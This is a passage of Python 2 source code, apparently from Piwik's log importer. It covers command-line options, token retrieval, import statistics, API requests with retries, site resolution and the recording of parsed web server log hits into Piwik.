excluded). " "Can be specified multiple times" ) option_parser.add_option( '--exclude-path', dest='excluded_paths', action='append', default=[], help="Any URL path matching this exclude-path will not be imported in Piwik. Can be specified multiple times" ) option_parser.add_option( '--exclude-path-from', dest='exclude_path_from', help="Each line from this file is a path to exclude (see: --exclude-path)" ) option_parser.add_option( '--include-path', dest='included_paths', action='append', default=[], help="Paths to include. Can be specified multiple times. If not specified, all paths are included." ) option_parser.add_option( '--include-path-from', dest='include_path_from', help="Each line from this file is a path to include" ) option_parser.add_option( '--useragent-exclude', dest='excluded_useragents', action='append', default=[], help="User agents to exclude (in addition to the standard excluded " "user agents). Can be specified multiple times", ) option_parser.add_option( '--enable-static', dest='enable_static', action='store_true', default=False, help="Track static files (images, css, js, ico, ttf, etc.)" ) option_parser.add_option( '--enable-bots', dest='enable_bots', action='store_true', default=False, help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'" ) option_parser.add_option( '--enable-http-errors', dest='enable_http_errors', action='store_true', default=False, help="Track HTTP errors (status code 4xx or 5xx)" ) option_parser.add_option( '--enable-http-redirects', dest='enable_http_redirects', action='store_true', default=False, help="Track HTTP redirects (status code 3xx except 304)" ) option_parser.add_option( '--enable-reverse-dns', dest='reverse_dns', action='store_true', default=False, help="Enable reverse DNS, used to generate the 'Providers' report in Piwik. " "Disabled by default, as it impacts performance" ) option_parser.add_option( '--strip-query-string', dest='strip_query_string', action='store_true', default=False, help="Strip the query string from the URL" ) option_parser.add_option( '--query-string-delimiter', dest='query_string_delimiter', default='?', help="The query string delimiter (default: %default)" ) option_parser.add_option( '--log-format-name', dest='log_format_name', default=None, help=("Access log format to detect (supported are: %s). " "When not specified, the log format will be autodetected by trying all supported log formats." % ', '.join(sorted(FORMATS.iterkeys()))) ) available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status', 'length', 'host', 'userid', 'generation_time_milli', 'event_action', 'event_name', 'timezone', 'session_time'] option_parser.add_option( '--log-format-regex', dest='log_format_regex', default=None, help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. " "Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. " "Overrides --log-format-name." % (', '.join(available_regex_groups)) ) option_parser.add_option( '--log-date-format', dest='log_date_format', default=None, help="Format string used to parse dates. You can specify any format that can also be specified to " "the strptime python function." ) option_parser.add_option( '--log-hostname', dest='log_hostname', default=None, help="Force this hostname for a log format that doesn't include it. All hits " "will seem to come to this host" ) option_parser.add_option( '--skip', dest='skip', default=0, type='int', help="Skip the n first lines to start parsing/importing data at a given line for the specified log file", ) option_parser.add_option( '--recorders', dest='recorders', default=1, type='int', help="Number of simultaneous recorders (default: %default). " "It should be set to the number of CPU cores in your server. " "You can also experiment with higher values which may increase performance until a certain point", ) option_parser.add_option( '--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int', help="Maximum number of log entries to record in one tracking request (default: %default). " ) option_parser.add_option( '--replay-tracking', dest='replay_tracking', action='store_true', default=False, help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee http://piwik.org/faq/how-to/faq_17033/" ) option_parser.add_option( '--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php', help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults " "to 'piwik.php' so only requests to the piwik.php file will be imported." ) option_parser.add_option( '--output', dest='output', help="Redirect output (stdout and stderr) to the specified file" ) option_parser.add_option( '--encoding', dest='encoding', default='utf8', help="Log files encoding (default: %default)" ) option_parser.add_option( '--disable-bulk-tracking', dest='use_bulk_tracking', default=True, action='store_false', help="Disables use of bulk tracking so recorders record one hit at a time." ) option_parser.add_option( '--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float', help="Debug option that will force each recorder to record one hit every N secs." ) option_parser.add_option( '--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true', help="Make URL path lowercase so paths with the same letters but different cases are " "treated the same." ) option_parser.add_option( '--enable-testmode', dest='enable_testmode', default=False, action='store_true', help="If set, it will try to get the token_auth from the piwik_tests directory" ) option_parser.add_option( '--download-extensions', dest='download_extensions', default=None, help="By default Piwik tracks as Downloads the most popular file extensions. If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped." ) option_parser.add_option( '--add-download-extensions', dest='extra_download_extensions', default=None, help="Add extensions that should be treated as downloads. See --download-extensions for more info." ) option_parser.add_option( '--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string', help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log " "files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used " "as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n" "Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more " "fields that can be mapped." % (', '.join(W3cExtendedFormat.fields.keys())) ) option_parser.add_option( '--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs', help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing" " IIS logs." ) option_parser.add_option( '--w3c-fields', dest='w3c_fields', default=None, help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if " "your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used " "in conjuction with --log-format-name=w3c_extended.\n" "Example: --w3c-fields='#Fields: date time c-ip ...'" ) option_parser.add_option( '--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string', help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the " "importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track " "the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) " "--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field " "in the 'Windows Status Code' custom variable. Regexes must contain a named group." ) option_parser.add_option( '--title-category-delimiter', dest='title_category_delimiter', default='/', help="If --enable-http-errors is used, errors are shown in the page titles report. If you have " "changed General.action_title_category_delimiter in your Piwik configuration, you need to set this " "option to the same value in order to get a pretty page titles report." ) option_parser.add_option( '--dump-log-regex', dest='dump_log_regex', action='store_true', default=False, help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats " "in newer versions of the script in older versions of the script. The output regex can be used with " "the --log-format-regex option." ) option_parser.add_option( '--ignore-groups', dest='regex_groups_to_ignore', default=None, help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, " "disable normal user id tracking. See documentation for --log-format-regex for list of available " "regex groups." ) option_parser.add_option( '--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string', help="Track an attribute through a custom variable with visit scope instead of through Piwik's normal " "approach. For example, to track usernames as a custom variable instead of through the uid tracking " "parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a " "custom variable named 'User Name'. The list of available regex groups can be found in the documentation " "for --log-format-regex (additional regex groups you may have defined " "in --log-format-regex can also be used)." ) option_parser.add_option( '--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string', help="Track an attribute through a custom variable with page scope instead of through Piwik's normal " "approach. For example, to track usernames as a custom variable instead of through the uid tracking " "parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a " "custom variable named 'User Name'. The list of available regex groups can be found in the documentation " "for --log-format-regex (additional regex groups you may have defined " "in --log-format-regex can also be used)." ) option_parser.add_option( '--retry-max-attempts', dest='max_attempts', default=PIWIK_DEFAULT_MAX_ATTEMPTS, type='int', help="The maximum number of times to retry a failed tracking request." ) option_parser.add_option( '--retry-delay', dest='delay_after_failure', default=PIWIK_DEFAULT_DELAY_AFTER_FAILURE, type='int', help="The number of seconds to wait before retrying a failed tracking request." ) option_parser.add_option( '--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int', help="The maximum number of seconds to wait before terminating an HTTP request to Piwik." ) return option_parser def _set_option_map(self, option_attr_name, option, opt_str, value, parser): """ Sets a key-value mapping in a dict that is built from command line options. Options that map string keys to string values (like --w3c-map-field) can set the callback to a bound partial of this method to handle the option. """ parts = value.split('=') if len(parts) != 2: fatal_error("Invalid %s option: '%s'" % (opt_str, value)) key, value = parts if not hasattr(parser.values, option_attr_name): setattr(parser.values, option_attr_name, {}) getattr(parser.values, option_attr_name)[key] = value def _parse_args(self, option_parser): """ Parse the command line args and create self.options and self.filenames. """ self.options, self.filenames = option_parser.parse_args(sys.argv[1:]) if self.options.output: sys.stdout = sys.stderr = open(self.options.output, 'a+', 0) if not self.filenames: print(option_parser.format_help()) sys.exit(1) # Configure logging before calling logging.{debug,info}. logging.basicConfig( format='%(asctime)s: [%(levelname)s] %(message)s', level=logging.DEBUG if self.options.debug >= 1 else logging.INFO, ) self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents]) if self.options.exclude_path_from: paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()] self.options.excluded_paths.extend(path for path in paths if len(path) > 0) if self.options.excluded_paths: self.options.excluded_paths = set(self.options.excluded_paths) logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths)) if self.options.include_path_from: paths = [path.strip() for path in open(self.options.include_path_from).readlines()] self.options.included_paths.extend(path for path in paths if len(path) > 0) if self.options.included_paths: self.options.included_paths = set(self.options.included_paths) logging.debug('Included paths: %s', ' '.join(self.options.included_paths)) if self.options.hostnames: logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames)) else: logging.debug('Accepted hostnames: all') if self.options.log_format_regex: self.format = RegexFormat('custom', self.options.log_format_regex, self.options.log_date_format) elif self.options.log_format_name: try: self.format = FORMATS[self.options.log_format_name] except KeyError: fatal_error('invalid log format: %s' % self.options.log_format_name) else: self.format = None if not hasattr(self.options, 'custom_w3c_fields'): self.options.custom_w3c_fields = {} elif self.format is not None: # validate custom field mappings for custom_name, default_name in self.options.custom_w3c_fields.iteritems(): if default_name not in type(format).fields: fatal_error("custom W3C field mapping error: don't know how to parse and use the '%' field" % default_name) return if not hasattr(self.options, 'regex_group_to_visit_cvars_map'): self.options.regex_group_to_visit_cvars_map = {} if not hasattr(self.options, 'regex_group_to_page_cvars_map'): self.options.regex_group_to_page_cvars_map = {} if not hasattr(self.options, 'w3c_field_regexes'): self.options.w3c_field_regexes = {} else: # make sure each custom w3c field regex has a named group for field_name, field_regex in self.options.w3c_field_regexes.iteritems(): if '(?P<' not in field_regex: fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name)) return if not self.options.piwik_url: fatal_error('no URL given for Piwik') if not (self.options.piwik_url.startswith('http://') or self.options.piwik_url.startswith('https://')): self.options.piwik_url = 'http://' + self.options.piwik_url logging.debug('Piwik URL is: %s', self.options.piwik_url) if not self.options.piwik_token_auth: try: self.options.piwik_token_auth = self._get_token_auth() except Piwik.Error, e: fatal_error(e) logging.debug('Authentication token token_auth is: %s', self.options.piwik_token_auth) if self.options.recorders < 1: self.options.recorders = 1 download_extensions = DOWNLOAD_EXTENSIONS if self.options.download_extensions: download_extensions = set(self.options.download_extensions.split(',')) if self.options.extra_download_extensions: download_extensions.update(self.options.extra_download_extensions.split(',')) self.options.download_extensions = download_extensions if self.options.regex_groups_to_ignore: self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(',')) def __init__(self): self._parse_args(self._create_parser()) def _get_token_auth(self): """ If the token auth is not specified in the options, get it from Piwik. """ # Get superuser login/password from the options. logging.debug('No token-auth specified') if self.options.login and self.options.password: piwik_login = self.options.login piwik_password = hashlib.md5(self.options.password).hexdigest() logging.debug('Using credentials: (login = %s, password = %s)', piwik_login, piwik_password) try: api_result = piwik.call_api('UsersManager.getTokenAuth', userLogin=piwik_login, md5Password=piwik_password, _token_auth='', _url=self.options.piwik_url, ) except urllib2.URLError, e: fatal_error('error when fetching token_auth from the API: %s' % e) try: return api_result['value'] except KeyError: # Happens when the credentials are invalid. message = api_result.get('message') fatal_error( 'error fetching authentication token token_auth%s' % ( ': %s' % message if message else '') ) else: # Fallback to the given (or default) configuration file, then # get the token from the API. logging.debug( 'No credentials specified, reading them from "%s"', self.options.config_file, ) config_file = ConfigParser.RawConfigParser() success = len(config_file.read(self.options.config_file)) > 0 if not success: fatal_error( "the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable to get the authentication token" ) updatetokenfile = os.path.abspath( os.path.join(os.path.dirname(__file__), '../../misc/cron/updatetoken.php'), ) phpBinary = 'php' is_windows = sys.platform.startswith('win') if is_windows: try: processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE) [stdout, stderr] = processWin.communicate() if processWin.returncode == 0: phpBinary = stdout.strip() else: fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option") except: fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue") command = [phpBinary, updatetokenfile] if self.options.enable_testmode: command.append('--testmode') hostname = urlparse.urlparse( self.options.piwik_url ).hostname command.append('--piwik-domain=' + hostname ) command = subprocess.list2cmdline(command) process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) [stdout, stderr] = process.communicate() if process.returncode != 0: fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option") filename = stdout credentials = open(filename, 'r').readline() credentials = credentials.split('\t') return credentials[1] def get_resolver(self): if self.options.site_id: logging.debug('Resolver: static') return StaticResolver(self.options.site_id) else: logging.debug('Resolver: dynamic') return DynamicResolver() class Statistics(object): """ Store statistics about parsed logs and recorded entries. Can optionally print statistics on standard output every second. """ class Counter(object): """ Simple integers cannot be used by multithreaded programs. See: http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe """ def __init__(self): # itertools.count's implementation in C does not release the GIL and # therefore is thread-safe. self.counter = itertools.count(1) self.value = 0 def increment(self): self.value = self.counter.next() def advance(self, n): for i in range(n): self.increment() def __str__(self): return str(int(self.value)) def __init__(self): self.time_start = None self.time_stop = None self.piwik_sites = set() # sites ID self.piwik_sites_created = [] # (hostname, site ID) self.piwik_sites_ignored = set() # hostname self.count_lines_parsed = self.Counter() self.count_lines_recorded = self.Counter() # requests that the Piwik tracker considered invalid (or failed to track) self.invalid_lines = [] # Do not match the regexp. self.count_lines_invalid = self.Counter() # No site ID found by the resolver. self.count_lines_no_site = self.Counter() # Hostname filtered by config.options.hostnames self.count_lines_hostname_skipped = self.Counter() # Static files. self.count_lines_static = self.Counter() # Ignored user-agents. self.count_lines_skipped_user_agent = self.Counter() # Ignored HTTP erors. self.count_lines_skipped_http_errors = self.Counter() # Ignored HTTP redirects. self.count_lines_skipped_http_redirects = self.Counter() # Downloads self.count_lines_downloads = self.Counter() # Ignored downloads when --download-extensions is used self.count_lines_skipped_downloads = self.Counter() # Misc self.dates_recorded = set() self.monitor_stop = False def set_time_start(self): self.time_start = time.time() def set_time_stop(self): self.time_stop = time.time() def _compute_speed(self, value, start, end): delta_time = end - start if value == 0: return 0 if delta_time == 0: return 'very high!' else: return value / delta_time def _round_value(self, value, base=100): return round(value * base) / base def _indent_text(self, lines, level=1): """ Return an indented text. 'lines' can be a list of lines or a single line (as a string). One level of indentation is 4 spaces. """ prefix = ' ' * (4 * level) if isinstance(lines, basestring): return prefix + lines else: return '\n'.join( prefix + line for line in lines ) def print_summary(self): invalid_lines_summary = '' if self.invalid_lines: invalid_lines_summary = '''Invalid log lines ----------------- The following lines were not tracked by Piwik, either due to a malformed tracker request or error in the tracker: %s ''' % textwrap.fill(", ".join(self.invalid_lines), 80) print ''' %(invalid_lines)sLogs import summary ------------------- %(count_lines_recorded)d requests imported successfully %(count_lines_downloads)d requests were downloads %(total_lines_ignored)d requests ignored: %(count_lines_skipped_http_errors)d HTTP errors %(count_lines_skipped_http_redirects)d HTTP redirects %(count_lines_invalid)d invalid log lines %(count_lines_no_site)d requests did not match any known site %(count_lines_hostname_skipped)d requests did not match any --hostname %(count_lines_skipped_user_agent)d requests done by bots, search engines... %(count_lines_static)d requests to static resources (css, js, images, ico, ttf...) %(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions Website import summary ---------------------- %(count_lines_recorded)d requests imported to %(total_sites)d sites %(total_sites_existing)d sites already existed %(total_sites_created)d sites were created: %(sites_created)s %(total_sites_ignored)d distinct hostnames did not match any existing site: %(sites_ignored)s %(sites_ignored_tips)s Performance summary ------------------- Total time: %(total_time)d seconds Requests imported per second: %(speed_recording)s requests per second Processing your log data ------------------------ In order for your logs to be processed by Piwik, you may need to run the following command: ./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s' ''' % { 'count_lines_recorded': self.count_lines_recorded.value, 'count_lines_downloads': self.count_lines_downloads.value, 'total_lines_ignored': sum([ self.count_lines_invalid.value, self.count_lines_skipped_user_agent.value, self.count_lines_skipped_http_errors.value, self.count_lines_skipped_http_redirects.value, self.count_lines_static.value, self.count_lines_skipped_downloads.value, self.count_lines_no_site.value, self.count_lines_hostname_skipped.value, ]), 'count_lines_invalid': self.count_lines_invalid.value, 'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value, 'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value, 'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value, 'count_lines_static': self.count_lines_static.value, 'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value, 'count_lines_no_site': self.count_lines_no_site.value, 'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value, 'total_sites': len(self.piwik_sites), 'total_sites_existing': len(self.piwik_sites - set(site_id for hostname, site_id in self.piwik_sites_created)), 'total_sites_created': len(self.piwik_sites_created), 'sites_created': self._indent_text( ['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.piwik_sites_created], level=3, ), 'total_sites_ignored': len(self.piwik_sites_ignored), 'sites_ignored': self._indent_text( self.piwik_sites_ignored, level=3, ), 'sites_ignored_tips': ''' TIPs: - if one of these hosts is an alias host for one of the websites in Piwik, you can add this host as an "Alias URL" in Settings > Websites. - use --add-sites-new-hosts if you wish to automatically create one website for each of these hosts in Piwik rather than discarding these requests. - use --idsite-fallback to force all these log lines with a new hostname to be recorded in a specific idsite (for example for troubleshooting/visualizing the data) - use --idsite to force all lines in the specified log files to be all recorded in the specified idsite - or you can also manually create a new Website in Piwik with the URL set to this hostname ''' if self.piwik_sites_ignored else '', 'total_time': self.time_stop - self.time_start, 'speed_recording': self._round_value(self._compute_speed( self.count_lines_recorded.value, self.time_start, self.time_stop, )), 'url': config.options.piwik_url, 'invalid_lines': invalid_lines_summary } ## ## The monitor is a thread that prints a short summary each second. ## def _monitor(self): latest_total_recorded = 0 while not self.monitor_stop: current_total = stats.count_lines_recorded.value time_elapsed = time.time() - self.time_start print '%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % ( stats.count_lines_parsed.value, current_total, current_total / time_elapsed if time_elapsed != 0 else 0, (current_total - latest_total_recorded) / config.options.show_progress_delay, ) latest_total_recorded = current_total time.sleep(config.options.show_progress_delay) def start_monitor(self): t = threading.Thread(target=self._monitor) t.daemon = True t.start() def stop_monitor(self): self.monitor_stop = True class Piwik(object): """ Make requests to Piwik. """ class Error(Exception): def __init__(self, message, code = None): super(Exception, self).__init__(message) self.code = code class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler): """ Special implementation of HTTPRedirectHandler that logs redirects in debug mode to help users debug system issues. """ def redirect_request(self, req, fp, code, msg, hdrs, newurl): logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl)) return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl) @staticmethod def _call(path, args, headers=None, url=None, data=None): """ Make a request to the Piwik site. It is up to the caller to format arguments, to embed authentication, etc. """ if url is None: url = config.options.piwik_url headers = headers or {} if data is None: # If Content-Type isn't defined, PHP do not parse the request's body. headers['Content-type'] = 'application/x-www-form-urlencoded' data = urllib.urlencode(args) elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json': data = json.dumps(data) if args: path = path + '?' + urllib.urlencode(args) headers['User-Agent'] = 'Piwik/LogImport' try: timeout = config.options.request_timeout except: timeout = None # the config global object may not be created at this point request = urllib2.Request(url + path, data, headers) opener = urllib2.build_opener(Piwik.RedirectHandlerWithLogging()) response = opener.open(request, timeout = timeout) result = response.read() response.close() return result @staticmethod def _call_api(method, **kwargs): """ Make a request to the Piwik API taking care of authentication, body formatting, etc. """ args = { 'module' : 'API', 'format' : 'json2', 'method' : method, } # token_auth, by default, is taken from config. token_auth = kwargs.pop('_token_auth', None) if token_auth is None: token_auth = config.options.piwik_token_auth if token_auth: args['token_auth'] = token_auth url = kwargs.pop('_url', None) if kwargs: args.update(kwargs) # Convert lists into appropriate format. # See: http://developer.piwik.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter # Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2] # and not foo[1], foo[0], foo[2] (it will break Piwik otherwise.) final_args = [] for key, value in args.iteritems(): if isinstance(value, (list, tuple)): for index, obj in enumerate(value): final_args.append(('%s[%d]' % (key, index), obj)) else: final_args.append((key, value)) res = Piwik._call('/', final_args, url=url) try: return json.loads(res) except ValueError: raise urllib2.URLError('Piwik returned an invalid response: ' + res) @staticmethod def _call_wrapper(func, expected_response, on_failure, *args, **kwargs): """ Try to make requests to Piwik at most PIWIK_FAILURE_MAX_RETRY times. """ errors = 0 while True: try: response = func(*args, **kwargs) if expected_response is not None and response != expected_response: if on_failure is not None: error_message = on_failure(response, kwargs.get('data')) else: error_message = "didn't receive the expected response. Response was %s " % response raise urllib2.URLError(error_message) return response except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout), e: logging.info('Error when connecting to Piwik: %s', e) code = None if isinstance(e, urllib2.HTTPError): # See Python issue 13211. message = 'HTTP Error %s %s' % (e.code, e.msg) code = e.code elif isinstance(e, urllib2.URLError): message = e.reason else: message = str(e) # decorate message w/ HTTP response, if it can be retrieved if hasattr(e, 'read'): message = message + ", response: " + e.read() errors += 1 if errors == config.options.max_attempts: logging.info("Max number of attempts reached, server is unreachable!") raise Piwik.Error(message, code) else: logging.info("Retrying request, attempt number %d" % (errors + 1)) time.sleep(config.options.delay_after_failure) @classmethod def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None): return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers, data=data) @classmethod def call_api(cls, method, **kwargs): return cls._call_wrapper(cls._call_api, None, None, method, **kwargs) ## ## Resolvers. ## ## A resolver is a class that turns a hostname into a Piwik site ID. ## class StaticResolver(object): """ Always return the same site ID, specified in the configuration. """ def __init__(self, site_id): self.site_id = site_id # Go get the main URL site = piwik.call_api( 'SitesManager.getSiteFromId', idSite=self.site_id ) if site.get('result') == 'error': fatal_error( "cannot get the main URL of this site: %s" % site.get('message') ) self._main_url = site['main_url'] stats.piwik_sites.add(self.site_id) def resolve(self, hit): return (self.site_id, self._main_url) def check_format(self, format): pass class DynamicResolver(object): """ Use Piwik API to determine the site ID. """ _add_site_lock = threading.Lock() def __init__(self): self._cache = {} if config.options.replay_tracking: # get existing sites self._cache['sites'] = piwik.call_api('SitesManager.getAllSites') def _get_site_id_from_hit_host(self, hit): return piwik.call_api( 'SitesManager.getSitesIdFromSiteUrl', url=hit.host, ) def _add_site(self, hit): main_url = 'http://' + hit.host DynamicResolver._add_site_lock.acquire() try: # After we obtain the lock, make sure the site hasn't already been created. res = self._get_site_id_from_hit_host(hit) if res: return res[0]['idsite'] # The site doesn't exist. logging.debug('No Piwik site found for the hostname: %s', hit.host) if config.options.site_id_fallback is not None: logging.debug('Using default site for hostname: %s', hit.host) return config.options.site_id_fallback elif config.options.add_sites_new_hosts: if config.options.dry_run: # Let's just return a fake ID. return 0 logging.debug('Creating a Piwik site for hostname %s', hit.host) result = piwik.call_api( 'SitesManager.addSite', siteName=hit.host, urls=[main_url], ) if result.get('result') == 'error': logging.error("Couldn't create a Piwik site for host %s: %s", hit.host, result.get('message'), ) return None else: site_id = result['value'] stats.piwik_sites_created.append((hit.host, site_id)) return site_id else: # The site doesn't exist, we don't want to create new sites and # there's no default site ID. We thus have to ignore this hit. return None finally: DynamicResolver._add_site_lock.release() def _resolve(self, hit): res = self._get_site_id_from_hit_host(hit) if res: # The site already exists. site_id = res[0]['idsite'] else: site_id = self._add_site(hit) if site_id is not None: stats.piwik_sites.add(site_id) return site_id def _resolve_when_replay_tracking(self, hit): """ If parsed site ID found in the _cache['sites'] return site ID and main_url, otherwise return (None, None) tuple. """ site_id = hit.args['idsite'] if site_id in self._cache['sites']: stats.piwik_sites.add(site_id) return (site_id, self._cache['sites'][site_id]['main_url']) else: return (None, None) def _resolve_by_host(self, hit): """ Returns the site ID and site URL for a hit based on the hostname. """ try: site_id = self._cache[hit.host] except KeyError: logging.debug( 'Site ID for hostname %s not in cache', hit.host ) site_id = self._resolve(hit) logging.debug('Site ID for hostname %s: %s', hit.host, site_id) self._cache[hit.host] = site_id return (site_id, 'http://' + hit.host) def resolve(self, hit): """ Return the site ID from the cache if found, otherwise call _resolve. If replay_tracking option is enabled, call _resolve_when_replay_tracking. """ if config.options.replay_tracking: # We only consider requests with piwik.php which don't need host to be imported return self._resolve_when_replay_tracking(hit) else: return self._resolve_by_host(hit) def check_format(self, format): if config.options.replay_tracking: pass elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname: fatal_error( "the selected log format doesn't include the hostname: you must " "specify the Piwik site ID with the --idsite argument" ) class Recorder(object): """ A Recorder fetches hits from the Queue and inserts them into Piwik using the API. """ recorders = [] def __init__(self): self.queue = Queue.Queue(maxsize=2) # if bulk tracking disabled, make sure we can store hits outside of the Queue if not config.options.use_bulk_tracking: self.unrecorded_hits = [] @classmethod def launch(cls, recorder_count): """ Launch a bunch of Recorder objects in a separate thread. """ for i in xrange(recorder_count): recorder = Recorder() cls.recorders.append(recorder) run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single t = threading.Thread(target=run) t.daemon = True t.start() logging.debug('Launched recorder') @classmethod def add_hits(cls, all_hits): """ Add a set of hits to the recorders queue. """ # Organize hits so that one client IP will always use the same queue. # We have to do this so visits from the same IP will be added in the right order. hits_by_client = [[] for r in cls.recorders] for hit in all_hits: hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit) for i, recorder in enumerate(cls.recorders): recorder.queue.put(hits_by_client[i]) @classmethod def wait_empty(cls): """ Wait until all recorders have an empty queue. """ for recorder in cls.recorders: recorder._wait_empty() def _run_bulk(self): while True: try: hits = self.queue.get() except: # TODO: we should log something here, however when this happens, logging.etc will throw return if len(hits) > 0: try: self._record_hits(hits) except Piwik.Error, e: fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error self.queue.task_done() def _run_single(self): while True: if config.options.force_one_action_interval != False: time.sleep(config.options.force_one_action_interval) if len(self.unrecorded_hits) > 0: hit = self.unrecorded_hits.pop(0) try: self._record_hits([hit]) except Piwik.Error, e: fatal_error(e, hit.filename, hit.lineno) else: self.unrecorded_hits = self.queue.get() self.queue.task_done() def _wait_empty(self): """ Wait until the queue is empty. """ while True: if self.queue.empty(): # We still have to wait for the last queue item being processed # (queue.empty() returns True before queue.task_done() is # called). self.queue.join() return time.sleep(1) def date_to_piwik(self, date): date, time = date.isoformat(sep=' ').split() return '%s %s' % (date, time.replace('-', ':')) def _get_hit_args(self, hit): """ Returns the args used in tracking a hit, without the token_auth. """ site_id, main_url = resolver.resolve(hit) if site_id is None: # This hit doesn't match any known Piwik site. if config.options.replay_tracking: stats.piwik_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite')) else: stats.piwik_sites_ignored.add(hit.host) stats.count_lines_no_site.increment() return stats.dates_recorded.add(hit.date.date()) path = hit.path if hit.query_string and not config.options.strip_query_string: path += config.options.query_string_delimiter + hit.query_string # only prepend main url / host if it's a path url_prefix = self._get_host_with_protocol(hit.host, main_url) if hasattr(hit, 'host') else main_url url = (url_prefix if path.startswith('/') else '') + path[:1024] # handle custom variables before generating args dict if config.options.enable_bots: if hit.is_robot: hit.add_visit_custom_var("Bot", hit.user_agent) else: hit.add_visit_custom_var("Not-Bot", hit.user_agent) hit.add_page_custom_var("HTTP-code", hit.status) args = { 'rec': '1', 'apiv': '1', 'url': url.encode('utf8'), 'urlref': hit.referrer[:1024].encode('utf8'), 'cip': hit.ip, 'cdt': self.date_to_piwik(hit.date), 'idsite': site_id, 'dp': '0' if config.options.reverse_dns else '1', 'ua': hit.user_agent.encode('utf8') } if config.options.replay_tracking: # prevent request to be force recorded when option replay-tracking args['rec'] = '0' # idsite is already determined by resolver if 'idsite' in hit.args: del hit.args['idsite'] args.update(hit.args) if hit.is_download: args['download'] = args['url'] if config.options.enable_bots: args['bots'] = '1' if hit.is_error or hit.is_redirect: args['action_name'] = '%s%sURL = %s%s' % ( hit.status, config.options.title_category_delimiter, urllib.quote(args['url'], ''), ("%sFrom = %s" % ( config.options.title_category_delimiter, urllib.quote(args['urlref'], '') ) if args['urlref'] != '' else '') ) if hit.generation_time_milli > 0: args['gt_ms'] = int(hit.generation_time_milli) if hit.event_category and hit.event_action: args['e_c'] = hit.event_category args['e_a'] = hit.event_action if hit.event_name: args['e_n'] = hit.event_name if hit.length: args['bw_bytes'] = hit.length # convert custom variable args to JSON if 'cvar' in args and not isinstance(args['cvar'], basestring): args['cvar'] = json.dumps(args['cvar']) if '_cvar' in args and not isinstance(args['_cvar'], basestring): args['_cvar'] = json.dumps(args['_cvar']) return args def _get_host_with_protocol(self, host, main_url): if '://' not in host: parts 